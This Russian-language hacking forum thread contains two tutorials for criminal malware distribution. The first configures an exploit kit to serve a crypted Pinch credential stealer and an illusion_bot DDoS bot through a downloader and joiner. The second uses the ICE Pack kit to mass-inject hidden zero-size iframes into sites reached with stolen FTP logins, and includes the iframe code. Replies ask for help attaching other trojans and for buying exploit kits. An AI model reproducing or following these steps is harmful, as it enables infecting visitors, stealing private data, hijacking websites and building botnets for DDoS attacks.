Перейти к содержимому

 Друзья: Крипторы и джойнеры | XaKePoK.Su | Всё для вебмастера | [ Реклама на форуме ]

Распространение троянов при помощи связки экссплоитов.


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 7

#1
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Сейчас я раскажу как распространить тот или иной вирус помошью связки!
Что нам для этого понадобится:

1)Хостинг с поддержкой php и mysql.
2)Сама связка (для примера я беру rds/mdac).
3)То что будем распростронять на примере Ддос бот и пинч!
4)Стата на пинч.
5)Криптеры для того чтобы скрыть от антивирусов.
6)Даунлоадер загружает на зараженный компьютер файл.


Поехали!

1.Разпаковываем rds и заливаем на хостинг в нужную нам папку.
Так приступим к настройке:
Нужно отредоктировать inc/config.php
$location="http://localhost/temp/"; - путь к скрипту
$db_host = "localhost"; - хост базы
$db_name = "stat"; - имя базы
$db_user = "stata"; - имя пользователя
$db_pass = "pass"; - пароль
$timeout = 3600*24; - таймаут
Сохраняем.
В корне куда мы залили связку находится файл load.exe это простенькая
программа которая выводит всплывающее сообщение.
и так проверим нашу связку! заходим по адресу ]]>http://localhost/temp/]]> и видим несколько мессагебоксов.

Тоесть связка работает!

2.Теперь перейдем к настройке Пинча. Берем пинч 2.99.
Пинч работает через gate поэтому на хостинге создаем папку gate или подобную
устанавливаем на нее права 0777 и заливаем gate.php.
Переходим к самому пинчу запускаем билдери вводим

Хост: localhost - наш хост
Путь: /gate/gate.php - путь к гейту
e-mail: admin@mail.ru - мыло на которое будут приходить отчеты
Тема: Тема письма - тема письма
Имя report.bin - название файла.
после чего нажимаем создать.Все пинч готов но он палится антивирусами!
Для этого берем криптеры и криптуем его до нужного нам результата!
Все троян готов для работы!!

3.Перейдем к настройке ДДос бота illusion_bot.
Запускаем Build.exe и выбираем edit binary и открываем чистого бота.

В IRC Administration тут настраиваем адреи ирк сервера канал и пароль
В Web Administration Настравиваем управлением ботнетом через web указываем ип сервера и папку где будут лежать наши скрипты.

В default Services выбираме нужно лии нам открывать Сокс Фтп или забиндить шел!

В Irc access настраиваем падоль бота также можно указать мд5 хеш пароля

В Options выбираем опции

Add to autoload - добавлять в автозапуск
Install Kernel Driver - устанавливать и использовать драйвер уровня ядра
Store Services State in registry - сохранять (перед выходом) запущенные сервисы (socks, ftp)
и их порты
Colored IRC messages - писать в IRC цветами
Auto OP admin on IRC channel - дать ОПа ботмастеру (если у бота он есть, конечно)
Inject Code to explorer.exe - если драйвер установить не удалось (или такая опция не выбрана),
можно выполнять код от имени explorer.exe.

В Flood values выбираем параметры флуда

При администротировании через вэб загружаем скрипты которые идут с ботом в директорию токорую указали при настройке.
редактируем index.php указуем пароль для доступа к админке а также пароль к базе данных заходим на сайт нажимаем install.

Все Бот настроен и готов к использованию только поскольку он палится берем крипторы и криптуем его!

Теперь с папки бота нужно залить удаленно управление ботом на наш сервер.
Копируем папку WebAdmin в нужную нам папку.
открываем index.php и редактируем его:

/* пароль доступа к админке */
$password = "123";

/* MySQL */
$mysql_host = "localhost";
$mysql_user = "root";
$mysql_password = "";

/* имя БД */
$mysql_dbname = "bots";

/* имя таблицы */
$mysql_bots_table = "bots";

/* время удаление неактивным ботов.. ставьте чуть больше чем в боте */
$refreshtime = 915;

/* файл, где будет храниться команда для всех новых (приходящих ботов) */
$newcmdfile = "command4new.txt";

На файл command4new.txt не забываем ставить права 0777.
Все Бот и админка его готовы!

4. Теперь настроим стату для пинча чтобы автоматизировать весь процесс!
Для этого все скрипты копируем к нам на сервер! Устанавливаем права 0777 на файл stat.dat.
Открываем confog.php:
$nameuser = "test"; - имя пользователя
$passuser = "test"; - пароль
$RR = "100";
Стата готова к использованию!

5.Переходим к последниму пункту!
Разкажу о такой софтвине как Builder trojan downloader v1.2 beta public

Даунлоадер - загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере.

Принцип работы

После запуска сливает файл с url-a и сохраняет на зараженый компьютер
в директорию заданную билдером (например в папку винды), и запускает ваш файл.
После запуска вашего файла удаляет свое тело.

Теперь к применению настраиваем ее так:
Загружаем на сервер Ддос бота ]]>http://localhost/Ddos.exe]]>
и создаем Даунлоадер.

Зачем Это?
ну допустим если вы собрались распространять просто пинч то незачем.
а если пинч и ддос бота то это самый раз! Не забываем его криптануть т.к он палится!
Просто потом мы берем freejoiner и склеиваем его с пинчем подставляя любую иконку.

И заменяем его вместо load.exe в нашей связке, при переходе на страницу запустится пинч и
Даунлоадер который сам загрузит и запустит бота! Что нам и надо!!

В итоге мы имеем свой ботнет и приватную информацию!

В этой статье исользовались все паблик программы которые есть в архиве ниже!

СТАТЬЯ МОЖЕТ БЫТЬ ИСПОЛЬЗОВАНА ТОЛЬКО В УЧЕБНО-ПОЗНАВАТЕЛЬНЫХ ЦЕЛЯХ!
Так что если вы собираетесь нарушать закон, то автор статьи не несет за это никакой ответственности!

Автор: Неузнаваемый©


Ссылки из под хайдов не выдаю!


#2
DarckSol

DarckSol

    Байт

  • Extended
  • Pip
  • 95 сообщений
Баян, на илюжене бот нет был актуален цать лет назат.
За статейку для нубов +1)...
Это я написал почти полтора года назат, а может больше, не помню уже... ну вообщем вооля:



Ice Pack как его юзать...
Итак Сегнодня мы поговорим свами про Експлоит ICE Pack Platinum. Большенсто народу знает что такое "Експлоит", для тех что этого незнает объясню популярно: Это грубо говара "программа/скрипт" который(ая) генерирует специальный запрос в в результате чего происходят какие либо действия.
Мы сегодня говорим про пакет сплоитов, что он из себя представляет:
1) Стандартный набор сплоитов.
2) Лоадер файлов.
3) Статистика посещаимости/загрузок.
4) Фтп Чекер, тамже скрипт который вставляет код iframe. (Что такое iframe опишу позже.)
5) Фильтр трафика.
Это самые основные функции которые я использую в данном Експлоите. Итак, что нам надо для работы с данным експлоитом:
1) Зарегестрировать какойнибуть хостинг, либо просто его купить. Проще и быстрее будет его зарегестрировать. Для этого есть например вот эти хостеры: www.jino-net.ru или www.hut.ru
2) Залить на хост все фаилы необходимые для работы Експлоита.
3) Отредактировать фаил db.php, что так вообще есть :
***
define ("DBHOST", "адрес до базы данных");
define ("DBNAME", "имя базы данных");
define ("DBUSER", "Пользователь базы данных");
define ("DBPASS", "И конечно же пароль");
***
Но прежде чем всё это делать, надо создать саму базу данных, на разных хостах это делается по разному... поэтому тут вам придётся немного проявить смекалку и сообразительность.
Как тока вы всё это сделали, настроили db.php, сохраняем настройки и пережодим к установке Експлоита. Но для начала нам необходимо выставить права на папки и файлы:
***ПРАВА ЗАПИСИ И ЧТЕНИЯ*777***
Папка load,
папка admin/tmp
файл config.php
*****************
Это важно, поскольку эти настройки будут менятся в зависимости от настроек Експолита.
]]>GeoIP.dat]]> для того что бы можно было по IP адресу можно было определить страну. Мы распаковываем его из архива и тоже заливаем на хостинг в директорию с Експлоитом.
Выполняем файлик install.php, и вооля, видем что нам говорят: Уснановка успешно завершена, или что то похожее на это и предлагают зайти и настраивать дальше. В случае если у вас там появляются какието ошибки, это значит что вы что то недоделали и где то в чём то ошиблись.
Заходим на титульный лист админки (www.syte.ru/admin/) и видем логотип ICe Pack ну и всё такое, вводим логин и пароль, и видем примерно вот это: Изображение, тут описывается версия пхп на хостинге, использование MySQL, использование SaveMode, Общее чесло посищений... Вверху у нас есть кнопки, мы выбераем
ИНСТРУМЕНТЫ и в выпадающей строка нункт НАСТРОЙКИ и видем вот это:
Изображение Тут у нас есть:
1) URL Скрипта, тут необходимо прописать адрес до места где установлен Експлоит(http://syte.ru)
2) Имя пользователя (по умолчанию "root")
3) Пароль пользователя  (по умолчанию "toor")
4) Файл для загрузки (Данный фаил будет загружатся и выполнятся при успешной работе Експлоита)
Жмём кнопку сохранить, и идём дальше...
*****Работа с FTP*****
Жмйм туда и опять выпадающая строка, выбераем импорт видем вот это:
Изображение
Жмём обзор, выбераем файл в котором записаны FTP аккаунты... <<Самый интересный Вопрос откуда бы нам их взять, простой ответ, используйте в качестве фаила для Експлоита Pinch 2.99. Или другие трояны.>>
Жмём начать, и тут скрипт загружет нам фпт из файла на хост.
Спускаемся ещё ниже...
**Проверка Фтп(FTp Checker)**
Тотже процесс, Работа с фтп..Проверка видем вот жто:
Изображение тут мы видем что кнопку НАЧАТЬ, нажимаем её, и ссылка: <<просмотр процесса>> нажимаме туда, видем как идёт процесс проверки ФТП акаунтов, видем какой у них PR, чем больше тем лучше... ЧТо такое PR можно почитать ]]>тут]]>.
Как тока унас всё прочекалось мы перебираемся в самы низ, выбираем пункт ОЧИСТКА, там появляются 3 пунктика:
1) Удаление нерабочих FTP
2) Удаление рабочих FTP
3) Удаление всех FTP
Нам нужен только 1(Удаление нерабочих FTP), ставим туда точечку и жмём НАЧАТЬ.
Итак наконецто мы пришли к сакоку интересному, ТРАФИК, откуда бы нам его взять, и как это осуществить?...
***Устанавливаем Код iframe***
Для начала, что такое iframe: Пишу простыми словами, это грубо говаря открытее окна в окне, что бы всем было понятно... расмотрим код:<iframe src="http://Syte//index.php" width="0" height="0"></iframe>
Нас интересует вот это: width="0" height="0".
width="0"- Высота окна 0
height="0" - Ширина окна 0
Это делается для того что бы неспалить где находится нашь сплоит и что там вообще происходит, человек заходит на сайт на котором весит iframe, его браузер автоматически загружеает САЙТ на оторый он зашол, и тут выполнряется код iframe, он заходит на сплоит, если он срабатывает, то фаил будет загружен и выполнен.
Как нам это проернуть? А вот так:
Заходим в РАБОТА с ФТП, и выбераем Установить Код, появляется вот такое окно:
Изображение
В середине окна поле ввода, тут мы пишем код ифрайма, а где нам его взять?
Мы переходим на закладку ИНСТРУМЕНТЫ и выбераем пункт КОД iframe, вот что вы там должны увидеть:
Изображение, копируем код из Level 0 или Level 2, кому как больше нравится.
Вперходим на Работа с ФТП, вставить код, в поле копируем нашь код, выбераем что делать с файло Index.php(.html, и т.д) а можем мы вот что:
1) Запись перед </body>
2) В конец файла
3) Перезапись файлов
И дополнительная функция: Удалять фреймы.
Эта функция удалет ваши старые или чужие коды iFrame, что бы трафик шол тока к вам, я обычно её включаю, но это дело вкуса.
Жмём кнопочку НАЧАТЬ и как всегда переходим на ссылку [просмотру прогресса], и смотри как на ваши FTP Акаунты устанавливается iFrame код.
***Конец***
Ну что же на этом я заканчиваю это статейку, желаю всем приятного время припровождения.
***************
Автор продукта ненесёт ответственности за ущерб нанесённый даннов программой, посколку она была придумана строко в ознакомительныйх целях и для проверки собственной безопасности.
**************
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку  УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>

Изображение

#3
Gera=

Gera=

    Бит

  • Members
  • 2 сообщений
Хорошая статейка.
Ну а можно же вручную все сделать ? Код поставить код: iframe
зайти на хостинг и скопировать в файл и закрыть.
1.Окно когда вошли в админку, там уже есть  IP  ( Это получаеть те которые прошли по нашей ссылке ? ) и попали к нам в админку.
2.мне вот не понятно.когда нужно загружать трояна ???
3.Эта связка все трояны потдерживает ??
4.и как это можно понять гнать трафик? Куда и где его нужно собирать ???
я новичек в этой теме

#4
Gera=

Gera=

    Бит

  • Members
  • 2 сообщений
Вот было бы хорошо если бы вы на писали как можно прикрепить Poisona
К этой связке..

#5
DarckSol

DarckSol

    Байт

  • Extended
  • Pip
  • 95 сообщений
Просто заменить файл который грузит связка, то есть сделать всё тоже самое, но вместо бота на загрузку поставить тот файл, который нужен и он будет грузится, в дальнейшем файл просто можно менять.
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку  УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>

Изображение

#6
Brizliane

Brizliane

    Бит

  • Members
  • 10 сообщений
Запустил опять бота на компе в панели не хера в чем проблема ?

Сделал бота как тут подключил панель запустил бота 0 реакции в панели ХЕлп

#7
rezvey

rezvey

    Бит

  • Members
  • 4 сообщений
Стучи в личку помогу!!!

#8
Xech

Xech

    Бит

  • Members
  • 3 сообщений
Подскажите, пожалуйста, есть ли ещё где нибудь актуальные связки сплоитов ?
Готов купить за любые деньги или отблагодарю в бтс на пиво тому кто подскажет контакт селлера в личку.


Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 анонимных